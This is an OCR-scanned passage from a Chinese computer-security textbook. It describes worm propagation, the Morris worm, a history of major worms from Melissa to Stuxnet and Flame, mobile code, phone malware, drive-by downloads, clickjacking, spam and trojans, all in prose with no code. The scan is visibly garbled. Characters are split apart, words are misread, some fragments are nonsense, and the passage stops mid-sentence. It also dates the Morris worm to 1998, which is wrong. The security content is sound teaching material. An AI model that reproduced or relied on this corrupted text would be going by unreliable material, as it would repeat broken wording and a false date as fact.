和 感染 主机 的 数量 取决 于 许多 因素 ， 其 中 包括 传播 模式 、 所 利用 的 漏洞 ， 以 及 与 现 有 攻击 的 相 
似 度 。 对 于 最 后 一 个 因素 ， 相 比 一 个 全 新 的 攻击 ， 现 有 攻击 的 某 个 变种 能 够 被 更 有 效 地 阻止 。 
文献 [ZOU05] 描述 的 模型 与 图 6-3 所 述 的 蠕虫 传播 模型 基本 吻合 。 


6.4.3 Morris 蠕虫 


直到 新 一 代 里 虫 产生 之 前 ， 蠕 虫 中 最 为 人 们 所 熟知 的 还 是 1998 年 由 Robert Morris 所 编写 
并 发 布 到 Internet 上 的 Morris 蠕虫 [ORMA03]。Morris 蠕虫 是 为 了 在 UNIX 系统 中 传播 而 设计 
的 ， 它 使 用 了 多 种 不 同 的 技术 来 传播 。 当 蠕虫 的 某 个 拷贝 执行 时 ， 其 首要 任务 就 是 找到 从 当前 
主机 所 能 进入 的 其 他 主机 。Morris 蠕虫 是 通过 检查 主机 中 的 各 种 目录 列表 和 系统 表 来 完成 该 任 
务 的 ， 其 中 包括 : 当前 系统 所 信任 的 主机 表 、 用 户 的 邮件 转发 文件 、 远 程 账户 访问 权限 表 和 网 
络 连接 状态 报告 程序 。 对 于 每 一 台 找 到 的 主机 ，Meorris 蠕虫 会 尝试 多 种 方法 以 获得 访问 权 : 

1. Morris 蠕虫 试图 以 合法 用 户 的 身份 登录 远程 主机 。 在 这 种 方法 中 ， 首 先 ， 蠕 虫 会 试图 破 
解 本 地 口令 文件 。 然 后 ， 利 用 破解 得 到 的 口令 和 对 应 用 户 ID 登录 远程 主机 。 该 方法 的 前 提 是 
许多 用 户 在 不 同系 统 中 使 用 相同 的 口令 。 为 了 得 到 用 户 的 口令 ， 蚂 虫 执行 口令 破解 程序 ， 尝 
用 以 下 字符 串 作 为 口令 : 

a. 每 个 用 户 的 账户 名 和 账户 名 中 字母 的 简单 排列 。 
b. 内 置 的 432 个 Morris 认为 可 能 的 候选 口令 9。 
c. 本 地 系统 字典 中 的 所 有 单词 。 

2. 利用 UNIX 系统 finger 协议 的 漏洞 ， 这 个 漏洞 会 报告 远程 用 户 的 位 置 。 

3. 利用 负责 收发 邮件 的 远程 进程 的 调试 选项 中 的 一 个 陷 门 。 

如 果 上 面 所 提 到 的 这 些 攻击 中 有 任何 一 个 成 功 ，Morris 蠕虫 病毒 就 能 够 和 操作 系统 命令 
解释 器 进行 通信 。 它 会 向 该 命令 解释 器 发 送 一 个 简短 的 引导 程序 ， 并 发 出 一 个 命令 来 执行 该 程 
序 ， 然 后 注销 登录 。 然 后 引导 程序 回调 父 程序 并 下 载 蠕虫 的 其 余部 分 。 这 样 新 的 蠕虫 就 可 以 执 
行 了 。 


6.4.4 ”蠕虫 攻击 简 史 


“Melissa( 梅 丽 莎 ) 电子 邮件 蠕虫 是 第 一 代 同 时 含有 病毒 、 蠕 虫 和 木马 的 恶意 软件 
[CASS01]。 其 将 微软 Word 宏 病 毒 嵌 和 人 电子 邮件 的 附件 中 。 一 旦 接收 者 打开 电子 邮件 的 附件 ， 
宏 病 毒 就 会 被 激活 。 接 着 : 

1. 像 蠕 虫 的 传播 方式 一 样 ， 其 将 自己 发 送 给 用 户 电 子 邮件 地 址 簿 中 的 所 有 人 。 然 后 ， 

2. 像 病 毒 的 传播 方式 一 样 ， 损 害 用 户 系统 ， 包 括 令 一 些 安 全 软件 失效 和 拷贝 自身 到 其 他 文 
档 中 。 

3. 每 到 一 个 触发 时 间 ， 它 就 播放 《辛普森 一 家 》 中 的 一 名 台词 。 

在 1999 年 ， 这 种 电子 邮件 病毒 产生 了 一 个 更 具 破 坏 性 的 版 本 。 新 版 本 并 不 需要 用 户 打 
开 电 子 邮 件 的 附件 ， 只 要 用 户 浏览 邮件 就 会 激活 病毒 。 这 种 病毒 利用 了 电子 邮件 程序 支持 的 
Visual Basic 脚本 语言 。 

梅 丽 忒 蠕虫 只 要 被 激活 (无 论 是 通过 打开 电子 邮件 的 附件 还 是 仅 浏览 电子 邮件 )， 马 上 就 
向 被 感染 主机 知道 的 所 有 电子 邮件 地 址 转发 自己 ， 进 行 传 播 。 因 此 ， 原 先 病毒 需要 几 个 月 甚至 
几 年 才能 达到 的 传播 范围 ， 如 今 几 个 小 时 就 可 以 做 到 。 文 献 [CASS01] 78 WH MN RE RG 3 


O 本 书 的 Web 站 点 上 提供 了 完整 的 列表 。 
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天 时 间 便 可 感染 超过 十 万 台 计 算 机 ， 相 比 之 下 ， 老 式 病 毒 Brain EHE IL, E RETE 
间 感 染 数 千 台 计算 机 。 这 使 得 反 病 毒 软件 在 病毒 造成 很 大 破坏 之 前 做 出 响应 变 得 非常 困难 。 

2001 年 7 月 出 现 的 红色 代码 蠕虫 ( Code Red Worm) FEJT RERE. LERB 
蠕虫 利用 微软 的 IIS (Microsoft Internet Information Server) 安全 漏洞 渗透 到 系统 并 进行 传播 。 
它 还 使 Windows 系统 的 系统 文件 校 验 器 失效 。 该 蠕虫 通过 对 随机 的 IP 地 址 进行 探测 来 传播 到 
其 他 主机 上 。 在 某 段 时 间 内 ， 它 只 进行 传播 。 然 后 ， 它 利用 大 量 被 感染 的 主机 向 一 个 政府 Web 
站 点 发 送 大 量 数据 包 进 行 “ 拒 绝 服务 ”攻击 。 攻 击 之 后 该 蠕虫 将 暂时 停止 活动 一 段 时 间 ， 并 
定期 重新 展开 攻击 。 在 第 二 轮 攻 击 中 ， 红 色 代 码 里 虫 在 14 个 小 时 内 感染 了 近 36 万 台 服 务 器 。 
除了 对 目标 服务 器 造成 严重 破坏 外 ， 它 还 占用 了 大 量 的 Internet 资源 ， 并 造成 网 络 服务 中 断 
[MOOR02]。 

2001 年 8 月 首次 出 现 的 红色 代码 开 是 以 Microsoft IS 为 攻击 目标 的 蠕虫 变种 。 该 变种 试 
图 感染 与 被 感染 系统 处 于 同一 子 网 的 系统 ， 并 在 被 感染 主机 上 建立 一 个 后 门 ， 使 攻击 者 可 以 在 
这 些 主机 上 远程 执行 命令 。 

2001 年 9 月 发 行 的 尼 姆 达 (Nimda) 蠕虫 也 同时 具备 了 蜂 虫 、 病 毒 和 移动 代码 的 特征 。 尼 
姆 达 使 用 了 如 下 几 种 传播 方式 : 
电子 邮件 : 当 用 户 在 一 台 有 安全 漏洞 的 计算 机 上 打开 被 感染 的 电子 邮件 附件 时 ， 尼 
姆 达 被 激活 ， 它 首先 搜索 当前 主机 中 的 电子 邮件 地 址 ， 然 后 向 这 些 地 址 发 送 它 自身 的 
拷贝 。 
Windows 共享 : 尼 姆 达 会 扫描 主机 ， 和 寻找 不 安全 的 Windows 共享 文件 。 然 后 使 用 
NetBIOS86 作为 传输 机 制 去 感染 该 主机 中 的 这 些 共享 文件 ， 这 样 当 某 个 用 户 执 行 了 这 
些 共享 文件 时 尼 姆 达 就 被 激活 了 。 
Web 服务 器 : 尼 姆 达 扫 描 Web 服务 器 ， 查 看 是 否 存在 基于 微软 IS 平台 的 已 知 漏洞 。 
如 果 找 到 ， 它 会 试图 传 一 份 它 自己 的 拷贝 到 服务 器 上 ， 然 后 感染 这 台 服 务 器 和 上 面 的 
所 有 文件 。 

© Web 客户 端 ， 当 存在 漏洞 的 Web 客户 端 去 访问 被 尼 姆 达 感 染 的 服务 器 时 ， 这 个 客户 端 

程序 所 在 的 主机 将 会 被 感染 。 
e 后门: 如 果 一 个 工作 站 被 早期 的 蠕虫 感染 ， 如 “红色 代码 2”"， 尼 姆 达 会 利用 它们 已 经 
设置 好 的 后 门 访问 系统 。 

2003 年 初 ， 出 现 了 SQL Slammer 蠕虫 。 该 蠕虫 利用 了 微软 SQL 服务 器 上 的 缓冲 区 溢出 漏 
洞 。Slammer 蠕虫 的 代码 很 简短 且 传 播 极 其 迅速 ， 在 10 分 钟 内 就 感染 了 90% 的 存在 该 漏洞 的 
主机 。 

2003 年 未 ， 出 现 了 Sobig.F 蠕虫 。 它 利用 开放 的 代理 服务 器 将 被 感染 的 机 器 变 成 垃圾 邮件 
发 送 器 。 在 其 活动 最 频繁 的 时 候 ， 据 报告 显示 每 17 个 邮件 中 就 有 一 个 是 它 发 送 的 ， 而 且 仅 在 
最 初 的 24 个 小 时 内 就 生成 了 一 百 万 份 自身 的 拷贝 。 

Mydoom 是 2004 年 出 现 的 一 种 大 量 发 送 邮件 的 电子 邮件 蠕虫 。 它 沿袭 了 在 被 感染 计算 
机 上 安装 后 门 的 做 法 ， 从 而 使 黑客 可 以 远程 访问 用 户 的 口令 、 信 用 卡 卡号 等 数据 。Mydoom 
蠕虫 达到 了 每 分 钟 复制 1000 次 的 速度 ， 据 报道 其 在 36 个 小 时 内 ， 用 1 亿 条 被 感染 的 消息 将 
Internet 淹没 。 

”近期 在 许多 版 本 的 平台 中 都 迅速 流行 起 来 的 蠕虫 是 Warezov 蠕虫 家 族 [KIRK06]。 当 该 蠕 
虫 被 激活 时 ， 它 会 在 系统 目录 下 生成 一 些 可 执行 文件 ， 并 通过 添加 新 的 注册 表 项 ， 把 它 设置 成 
每 当 Windows 启动 都 自动 运行 。Warezov 在 多 种 类 型 的 文件 中 搜索 电子 邮件 地 址 ， 并 将 其 本 
身 作为 邮件 附件 发 送 。 它 的 一 些 变种 能 够 下 载 恶 意 软 件 ， 例 如 特洛伊 木马、 广告 软件 等 。 许 多 
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Warezov 的 变种 还 会 禁止 安全 相关 产品 的 运行 ， 使 其 不 能 升级 。 

首次 在 2008 年 11 月 发 现 的 Conficker (也 叫 Downadup) 蠕虫 快速 的 传播 ， 成 为 自 2003 年 
SQL Slammer 蠕虫 [LAWT09] 发 现 以 来 传播 感染 最 广泛 的 蠕虫 之 一 。 该 蠕虫 最 初 通 过 Windows 
系统 中 的 缓冲 区 溢出 漏洞 进行 传播 ， 后续 的 版 本 也 能 通过 USB 设备 或 网 络 文件 共享 进行 传 
播 。 当 今 ， 虽然 微 软 修复 了 该 蠕虫 所 攻击 的 主要 漏洞 ， 但 它 仍然 是 赛 门 铁 克 ( Symantec) 公司 
[SYMA13] 发 现 的 第 二 大 家 族 型 恶意 软件 。 

2010 年 ， 震 网 (Stuxnet) 蠕虫 病毒 被 发 现 ， 但 是 它 在 先前 的 一 些 时 间 已 经 悄悄 地 传播 开 来 
[CHEN11，KUSH13]。 与 许多 以 往 的 蠕虫 不 同 ， 震 网 蠕虫 故意 限制 其 传播 的 速率 以 减少 其 被 发 
现 的 机 会 。 它 把 目标 对 准 工业 控制 系统 ， 主 要 是 那些 与 伊朗 核 计 划 有 关 的 系统 。 震 网 支持 多 种 
传播 机 制 ， 包 括 USB 设备 、 网 络 文件 共享 ， 使 用 了 最 少 4 种 未 知 的 0-day 漏洞 。 其 规模 和 代 
码 的 复杂 度 、 前 所 未 有 的 4 个 0-day 漏洞 的 使 用 和 开发 中 的 花 销 与 付出 引发 了 相当 多 的 争论 。 
有 的 说 法 则 认为 震 网 蠕虫 可 能 是 第 一 个 被 正式 用 来 针对 国家 级 物理 设施 的 网 络 战 武器 。 而 研究 
人 员 在 分 析 震 网 蠕虫 时 注意 到 ， 尽 管 他 们 预料 到 能 够 发 现 软 件 具 有 间谍 行为 ， 但 却 从 未 想到 能 
看 到 有 恶意 软件 能 够 有 针对 性 地 破坏 其 目标 。 这 一 结果 已 经 导致 数 个 国家 将 注意 力 转向 应 用 恶 
意 软件 作为 武器 的 方向 上 来 。 

Duqu 蠕虫 发 现 于 2011 年 晚 些 时 候 ， 且 运用 了 与 震 网 蠕虫 相关 的 代码 。 虽 然 同 为 网 络 间谍 
程序 ， 其 目标 却 与 震 网 不 同 (尽管 看 上 去 仍然 是 针对 伊朗 核 计 划 的 )。 另 一 个 近期 的 著名 网 络 
间谍 程序 发 现 于 2012 年 ， 其 被 认为 是 针对 中 东 国 家 的 “超级 火焰 ( Flame)” 系列 病 毒 。 尽 管 
这 些 蠕虫 有 着 各 自 不 同 的 针对 区 域 ， 它 们 的 传染 策略 之 成 功 使 得 在 许多 国家 的 计算 机 系统 上 都 
发 现 了 他 们 的 踪迹 ， 甚 至 包括 那些 与 通用 互联 网 保持 着 物理 隔离 的 计算 机 系统 。 这 就 更 显示 出 
大 力 改进 对 抗 此 类 蠕虫 感染 的 反 制 措施 的 重要 性 了 。 


6.4.5 ”蠕虫 技术 的 现状 


蠕虫 技术 的 发 展 水 平 包括 如 下 特征 : 

e 多 平台 (multiplatform): 新 的 蠕虫 不 再 局 限于 Windows 平台 ， 它 们 可 以 攻击 多 种 平台 ， 
尤其 是 那些 流行 的 UNIX 类 平台 ， 或 者 攻击 支持 宏 或 脚本 语言 的 流行 的 文档 格式 。 

多 种 攻击 手段 (multiexploit) : 新 的 蠕虫 会 使 用 多 种 方法 对 系统 进行 渗透 ， 例 如 利用 
Web 服务 器 、 浏 览 器 、 电 子 邮件 、 文 件 共享 或 其 他 的 基于 网 络 的 应 用 程序 漏洞 。 
超 快 速 传播 (ultrafast spreading): 使 用 多 种 技术 手段 优化 蠕虫 的 传播 速率 ， 尽 可 能 在 短 
时 间 内 感染 尽 可 能 多 的 机 器 。 

多 态 (polymorphic): 为 了 躲避 检测 、 过 滤 和 实时 分 析 ， 蠕 虫 借鉴 了 病毒 的 多 态 技术 。 
每 个 蠕虫 的 拷贝 都 能 够 利用 在 功能 上 等 价 的 指令 和 加 密 技术 来 生成 新 的 代码 。 

© 变形 (metamorphic): 除了 改变 自身 形态 外 ， 变 形 蠕虫 还 根据 其 行为 模式 库 在 传播 的 不 
同 阶段 表现 出 不 同 的 行为 。 

传输 载体 〈transport vehicle): 因为 蠕虫 能 够 迅速 地 感染 大 量 系统 ， 因 此 它们 是 传播 其 
他 分 布 式 攻击 程序 (如 分 布 式 拒绝 服务 bot、rootkit、 垃 圾 电子 邮件 生成 器 和 间谍 软件 ) 
的 理想 载体 。 

0-day 攻击 (zero-day exploit): 为 获得 最 大 的 震动 和 扩散 范围 ， 蠕 虫 会 利用 未 被 人 知 的 
漏洞 。 这 种 漏洞 只 有 在 蠕 虫 发 起 攻击 时 ， 才 会 被 网 络 公众 所 发 现 。 


6.4.6 ”移动 代码 
移动 代码 指 那些 不 加 修改 就 能 够 在 不 同系 统 平台 上 运行 并 且 能 够 实现 相同 功能 的 程序 (如 


[216] 脚本 、 宏 或 其 他 可 移植 指令 ) [JANS08]。 


移动 代码 能 够 从 远程 系统 传送 到 本 地 系统 ， 然 后 在 没有 得 到 用 户 明确 许可 的 情况 下 在 本 
地 系统 中 运行 [SOUP13]。 移 动 代 码 经 常 作 为 病毒 、 蠕 虫 和 木马 传播 的 载体 ， 将 这 些 恶 意 代 
码 传播 到 用 户 的 系统 中 。 另 外 ， 移 动 代码 能 够 利用 漏洞 实现 某 些 功能 ， 例 如 非 授 权 的 数据 访 
问 或 特权 攻击 (root compromise)。 常 用 的 移动 代码 载体 类 型 ， 主 要 有 Java applet. ActiveX. 
JavaScript 和 VBScript。 使 移动 代码 能 够 在 本 地 系统 进行 恶意 操作 的 最 常见 方式 有 跨 站 点 脚本 、 
交互 式 动 态 Web 站 点 、 电 子 邮 件 附件 、 从 不 可 信和 网 站 下 载 程序 或 者 下 载 不 可 信和 软件 等 。 


6.4.7 手机 蠕虫 


手机 蠕虫 的 发 现 始 于 2004 年 Cabir 蠕 虫 的 出 现 ， 随 后 又 在 2005 年 出 现 了 Lasco 和 
Comm Warrior 蠕虫 。 这 些 蠕 虫 通过 蓝牙 无 线 连 接 或 彩信 (MMS) 进行 传染 。 手 机 蠕虫 的 感染 目 
标 是 那些 允许 用 户 从 非 蜂 窒 网 络 经 营 者 处 安装 应 用 程序 的 智能 手机 。 所 有 这 些 早期 的 手机 蠕 
虫 以 使 用 塞 班 系统 的 手机 为 目标 。 而 近期 的 恶意 软件 则 以 安 卓 系统 或 苹果 的 iOS 系统 为 目标 。 
这 些 恶 意 程序 可 以 使 手机 完全 瘫 病 ， 删 除 手机 数据 ， 或 者 向 收取 额外 费用 的 号 码 发 送信 息 。 

CommWarrior 蠕虫 利用 蓝牙 技术 向 接受 区 域内 的 其 他 手机 传播 。 它 也 以 彩信 的 方式 向 手 
机 通讯 录 中 的 号 码 发 送 自己 的 拷贝 ， 而 且 会 自动 回复 收 到 的 短信 和 彩信 。 除 此 之 外 ， 它 还 会 将 
自己 复制 到 手机 的 可 移动 存储 卡 中 并 且 将 自身 插入 到 手机 的 程序 安装 文件 中 。 

虽然 上 述 实例 表明 手机 蠕虫 传染 是 可 能 的 , 但 目前 已 知 的 大 多 数 手机 恶意 软件 仍 是 通过 含 
有 木马 的 应 用 程序 安装 包 (APP) 植 人 手机 的 [SYMA13]。 


6.4.8 客户 端 漏洞 和 夹带 式 下 载 


另 一 种 攻击 软件 漏洞 的 方式 是 利用 应 用 程序 中 的 缺陷 (bug) 来 安装 恶意 软件 。 其 中 最 普 
通 的 一 种 技术 利用 了 浏览 器 的 漏洞 ， 使 得 当 用 户 浏览 一 个 受 攻击 者 控制 的 Web 页 面 时 ， 该 
页 面包 含 的 代码 会 攻击 该 浏览 器 的 缺陷 并 在 用 户 不 知情 或 未 允许 的 情况 下 向 系统 安装 恶意 软 
件 。 该 方法 被 称 为 夹带 式 下 载 ( drive-by-download)， 其 是 当今 一 种 常见 的 攻击 方式 。 在 多 数 
情况 下 ， 这 类 恶意 软件 不 像 蠕 虫 那样 传播 ， 而 是 等 待 那些 无 防备 的 用 户 浏览 恶意 的 Web 页 
面 来 传播 。 

通常 ， 夹 带 式 下 载 攻 击 针 对 那些 访问 恶意 站 点 且 系 统 中 有 漏洞 可 以 利用 的 用 户 。 它 的 一 
个 变种 被 称 为 水 坑 式 攻击 ( watering-hole attack)， 这 是 一 种 具有 高 度 针对 性 的 攻击 [SYMA13]。 
攻击 者 通过 研究 他 们 意图 攻击 的 目标 ， 确 定 他 们 可 能 要 浏览 的 Web 站 点 ， 然 后 扫描 “这些 站 点 
找 出 那些 含有 能 让 他 们 植 人 夹带 式 下 载 的 漏洞 。 等 待 受 害 者 去 浏览 那些 有 害 的 站 点 。 他 们 的 攻 
击 代码 甚至 可 以 被 设 定 为 只 感染 属于 目标 组 织 的 系统 ， 而 对 其 他 浏览 该 站 点 的 访问 者 没有 影 
响 。 这 样 极 大 地 增加 了 受 控制 站 点 无 法 被 检测 出 来 的 可 能 性 。 . 

恶意 广告 (Malvertising) 是 另 一 种 通过 Web 站 点 部 署 恶 意 软件 的 技术 ,该 技术 不 会 真正 
损害 Web 站 点 [SYMA13]。 攻 击 者 在 他 们 目标 网 站 付 钱 植 和 包含 有 恶意 代码 的 广告 。 利 用 这 
些 恶 意 植 和 代码， 攻击 者 通过 向 访问 者 展示 广告 来 令 其 感染 。 这 些 恶意 代码 是 动态 生成 的 ， 这 
同样 可 以 减少 被 侦 测 到 的 机 会 ， 或 者 只 感染 特殊 的 系统 。 

还 有 一 些 相 关 的 变种 可 以 攻击 常用 电子 邮件 客户 端的 漏洞 ， 例 如 在 2001 年 10 月 发 现 的 求 
职 信 (Klez) 蠕虫 ， 其 利用 微软 Outlook 和 Outlook Express 程序 中 HTML 语言 的 漏洞 实现 自动 
运行 。 此 类 恶意 软件 也 可 在 用 户 浏览 恶意 的 PDF 文档 时 ， 在 未 经 用 户 允 许 情况 下 ， 利 用 PDF 
阅读 器 下 载 和 安装 恶意 软件 [STEV11]。 这 类 恶意 文档 通过 垃圾 电子 邮件 或 者 网 络 钓 鱼 进行 传 
播 ， 我 们 会 在 下 一 节 讨论 这 些 内 容 。 
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6.4.9 ”点 击 支持 


点 击 支持 ( clickjacking)， 也 称 为 用 户 界面 伪装 攻击 (user-interface(UT) redress attack)， 是 
一 种 攻击 者 收集 被 感染 用 户 鼠 标点 击 信息 的 攻击 。 攻 击 者 可 以 强迫 用 户 做 一 系列 的 事情 ， 从 调 
整 计 算 机 的 设置 到 在 用 户 不 知情 的 情况 下 让 用 户 访问 可 能 含有 恶意 代码 的 网 站 。 同 时 ， 利 用 
Adobe Flash 和 JavaScript， 攻 击 者 甚至 可 能 在 一 个 合法 按钮 的 上 面 或 者 下 面部 署 一 个 按钮 ， 并 
将 其 制作 成 难以 被 用 户 察觉 的 样子 。 这 种 攻击 的 典型 例子 是 利用 多 重 透 明 或 模糊 的 页 面 层次 来 
欺骗 用 户 在 试图 点 击 最 上 层 页 面 时 ， 却 实际 上 点 击 了 另 一 个 按钮 或 链接 到 另 一 个 页 面 。 因 此 ， 
攻击 者 实施 点 击 支持 的 意图 是 将 一 个 页 面 链 接 至 属于 其 他 应 用 、 域 名 (也许 两 者 都 是 ) 的 页 面 。 

利用 类 似 的 技术 ， 键 盘 输 入 也 可 以 被 支持 。 通 过 精心 制作 的 样式 表 、iframe 标签 和 文本 框 
等 页 面 元 素 的 组 合 ， 用 户 会 被 误导 而 以 为 他 们 在 为 电邮 或 银行 账户 输入 口令 ， 而 实际 上 他 们 将 
口令 输入 到 了 攻击 者 控制 的 一 个 不 可 见 的 框架 内 。 

现在 有 许多 种 技术 可 以 做 到 点 击 支持 ， 同 时 也 有 不 少 新 技术 被 开发 出 以 防御 业已 出 现 并 得 
到 实施 的 支持 技术 ,文献 [NIEM11] 和 [STON10] 就 此 做 出 了 有 用 的 讨论 。 


6.5 传播 - 社会 工程 学 - 垃圾 电子 邮件 、 木 马 


最 后 一 种 恶意 代码 传播 方式 我 们 将 围绕 社会 工程 学 展开 讨论 ， 其 “欺骗 ”用 户 协助 损害 他 
们 自己 的 系统 或 个 人 信息 。 这 种 情况 会 在 用 户 浏览 或 回应 一 些 垃圾 电子 邮件 或 允许 安装 和 执行 
一 些 木 马 程序 或 脚本 代码 时 出 现 。 


6.5.1 垃圾 (大 量 不 请 自 来 的 ) 电子 邮件 


近 十 多 年 来 ， 随 着 互联 网 爆炸 式 的 发 展 ， 电 子 邮 件 得 到 了 广泛 的 应 用 。 由 于 发 送 大 量 的 电 
子 邮 件 只 需 极 低 的 花费 ， 而 催生 了 大 量 的 不 请 自 来 的 电子 邮件 ， 也 就 是 我 们 熟知 的 垃圾 电子 邮 
件 。 最 近 的 一 些 预测 表明 ， 垃 圾 电子 邮件 发 送 量 可 能 占 所 有 邮件 发 送 量 的 90% 或 以 上 。 这 同 
时 增加 了 网 络 设备 传送 这 些 数据 流量 和 用 户 从 大 量 邮件 中 过 滤 合 法 邮件 的 开销 。 为 了 遏制 垃圾 
电子 邮件 的 爆炸 式 增长 ， 提 供 检 测 和 过 滤 垃 圾 邮件 产品 的 反 垃圾 邮件 产业 的 增长 也 同样 迅猛 。 
这 导致 了 双方 的 军备 竞赛 垃圾 邮件 发 送 者 发 明 新 技术 隐藏 邮件 内 容 ， 防 御 者 则 致力 于 阻止 它 
fi] [KREI09]。 

近年 来 ， 垃 圾 电子 邮件 的 数量 有 所 减少 。 一 个 原因 是 通过 社会 媒体 网 络 进行 的 攻击 ( 包 
括 垃 圾 邮件 ) 快速 增长 。 这 反映 出 社会 媒体 网 络 使 用 的 快速 增长 ， 为 攻击 者 开辟 了 新 的 阵地 
[SYMA13]。 

虽然 一 些 垃圾 邮件 是 由 合法 的 邮件 服务 商 发 送 的 ， 但 是 绝 大 多 数 的 邮件 是 由 僵尸 网 络 操 
纵 僵 尸 机 所 发 送 的 ， 对 此 我 们 会 在 6.6 节 中 进行 讨论 。 一 大 部 分 垃圾 电子 邮件 的 内 容 仅仅 是 广 
告 ， 试 图 说 服 收 件 人 在 线 上 购买 他 们 的 产品 ， 如 医药 ， 或 者 用 于 诈骗 ， 例 如 证 券 诈骗 或 钱 骤 招 
聘 广告 。 但 是 垃圾 邮件 同样 是 恶意 软件 的 重要 载体 。 电 子 邮 件 可 能 会 带 有 一 个 附件 文档 ， 如 果 
该 文档 被 打开 ， 它 会 攻击 软件 的 漏洞 来 向 用 户 的 系统 安装 恶意 软件 ， 就 像 我 们 在 之 前 提 及 的 那 
样 。 或 者 ， 垃 圾 邮件 也 可 能 附 有 一 个 木马 程序 或 者 脚本 代码 ， 在 其 运行 时 同样 可 以 向 用 户 的 系 
统 安装 恶意 软件 。 一 些 木马 利用 软件 的 漏洞 ， 在 得 到 用 户 许可 的 情况 下 实现 自身 的 安装 ， 我 们 
接 下 来 将 会 讨论 这 方面 的 内 容 。 最 后 ， 垃 圾 电子 邮件 可 以 被 用 作 和 钓鱼 攻击 ， 引 导 用 户 进 入 一 个 
看 上 去 与 合法 网 站 相似 的 非法 网 站 ， 如 网 银 的 网 站 ,试图 从 中 获取 用 户 的 登录 名 和 口令 ,或 者 
收集 足够 的 信息 以 允许 攻击 者 冒充 用 户 身份 进行 盗窃 。 但 是 ， 在 很 多 情况 下 ， 为 了 攻击 能 够 成 
功 ， 网 络 钓鱼 需要 用 户主 动 地 查看 邮件 和 附件 文档 ， 或 者 允许 安装 一 些 程序 。 
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6.5.2 ”特洛伊 木马 


特洛伊 木马 9 是 一 个 有 用 的 或 者 表面 上 看 起 来 有 用 的 程序 或 命令 过 程 ， 但 其 内 部 藏 有 恶意 
代码 ， 当 被 调用 时 ， 会 执行 非 预期 的 或 有 害 的 功能 。 

219 特洛伊 木马 程序 可 以 间接 完成 一 些 未 授权 用 户 无 法 直接 完成 的 功能 。 例 如 ， 在 一 个 共享 系 
统 中 ， 一 个 用 户 为 了 能 够 在 未 经 另 一 个 用 户 授权 的 情况 下 访问 其 私有 的 文件 ， 设 计 了 一 个 木马 
程序 。 当 木马 程序 被 执行 后 ， 它 会 扫描 用 户 的 文件 以 获取 想 要 的 隐私 信息 并 将 其 拷贝 下 来 通过 
Web 形式 、 电 子 邮件 或 者 文档 信息 的 形式 发 送 给 攻击 者 。 然 后 ， 攻 击 者 会 使 木马 和 游戏 程序 或 
实用 程序 组 合 在 一 起 ， 并 通过 知名 的 软件 发 布 网 站 或 应 用 程序 商店 将 其 分 发 ,诱惑 用 户 运 行 木 
马 。 最 近 ， 这 种 方法 已 经 得 到 广泛 使 用 ,通常 “宣称 ”是 最 新 的 防 病毒 扫描 软件 或 安全 更 新 ， 
但 实际 上 是 携带 如 搜索 银行 凭证 的 间谍 软件 等 有 效 载荷 的 恶意 木马 。 因 此 ， 用 户 需 要 采取 预防 
措施 来 验证 所 安装 的 软件 的 来 源 。 

特洛伊 木马 一 般 属 于 下 面 三 种 模型 中 的 一 种 : 
© 继续 执行 源 程序 的 功能 的 同时 ， 另 外 同时 执行 独立 的 恶意 行为 。 
o 继续 执行 源 程序 的 功能 ， 但 是 会 对 其 进行 修改 ， 以 执行 恶意 行为 《例如 登录 程序 木马 
会 收集 用 户 的 口令 ) 或 者 隐藏 男 一 个 恶意 行为 (例如 进程 列表 程序 木马 在 列 出 当前 所 有 
进程 时 不 显示 恶意 的 进程 )。 
© 用 恶意 功能 完全 替代 原 程序 的 功能 。 
一 些 木马 不 需要 用 户 的 协助 就 可 以 通过 攻击 软件 的 漏洞 实现 自动 安装 和 执行 。 它 们 利用 
了 蠕虫 的 一 些 特 性 ， 不 同 的 是 木马 并 不 能 自我 复制 。 一 个 此 类 攻击 的 著名 案例 是 在 2009 年 和 
2010 年 年 初 ， 极 光 行 动 ( Operation Aurora) 中 使 用 的 Hydra KE., CAJA IE 浏览 器 中 的 漏洞 
实现 自我 安装 ， 并 以 数 个 高 知名 度 的 公司 为 其 攻击 目标 [SYMA13]。 其 散播 方式 往往 是 利用 垃 
圾 邮件 或 者 通过 布置 于 一 个 被 俘获 网 站 中 的 “水 洞 式 攻击 ”来 进行 的 。 


6.5.3 FRAG 


手机 木马 首次 被 发 现 是 在 2004 年 ， 当 时 被 发 现 的 木马 被 称 为 “ Skuller” 。 和 手机 蠕虫 一 
样 ， 其 目标 是 智能 手机 ， 早 期 的 手机 木马 针对 塞 班 系统 。 近 年 来 ， 很 多 木马 将 目标 转向 了 安 卓 
手机 和 苹果 的 iPhone。 这 些 木马 通常 通过 服务 于 目标 操作 系统 的 一 个 或 多 个 应 用 程序 市 场 来 
传播 。 

2011 年 ， 谷 歌 从 安 卓 市 场 中 移 除 了 众多 含有 DroidDream 恶意 软件 的 木马 应 用 程序 。 这 款 
恶意 软件 是 一 个 强大 的 僵尸 机 代理 程序 ， 可 以 攻击 当时 在 使 用 中 的 某 些 版 本 安 卓 系统 的 漏洞 ， 
获取 系统 的 所 有 权限 以 监视 数据 和 安装 额外 代码 。 但 是 ， 这 仅仅 是 文献 [ZHOU12] 中 分 析 的 
49 个 安 卓 恶意 软件 家 族 中 的 一 种 。 他 们 研究 了 从 不 同安 卓 应 用 市 场 中 找到 的 超过 1200 种 恶意 
软件 的 样本 ， 发 现 90% 的 恶意 软件 样本 会 将 被 攻击 的 手机 加 入 至 一 个 僵尸 网 络 ， 通 常 还 会 开 
启 具有 高 额 附 加 费用 的 服务 或 者 收集 个 人 信息 。 他 们 进一步 发 现 ， 他 们 测试 的 手机 反 病 毒 产品 
没有 一 款 可 以 发 现 全 部 的 家 族 。 因 此 ， 需 要 更 加 深入 地 开发 反 病毒 产品 ， 特 别 是 要 跟 上 这 类 亚 

意 软件 的 快速 发 展演 化 。 
由 于 苹果 公司 对 其 应 用 商城 的 严格 控制 ， 苹 果 手 机 木马 目标 是 那些 被 “越狱 ”的 手机 ， 它 


O 希腊 神话 中 ,希腊 在 特洛伊 战争 时 使 用 了 特洛伊 木 马 。Epeios 建造 了 一 个 巨大 的 中 空 型 木马 ， 隐 藏 了 30 个 
最 英勇 的 希腊 士兵 。 其 余 的 希腊 军队 烧毁 了 他 们 的 帐篷 假装 逃走 ， 实 际 上 隐蔽 在 了 附近 。 特 洛 伊人 以 为 木 
马 是 他 们 的 战利品 ， 战 争 已 经 结束 了 ， 他 们 将 木马 拖 人 城内 。 深 夜 ， 木 马 内 的 希腊 士兵 为 希腊 军队 打开 了 
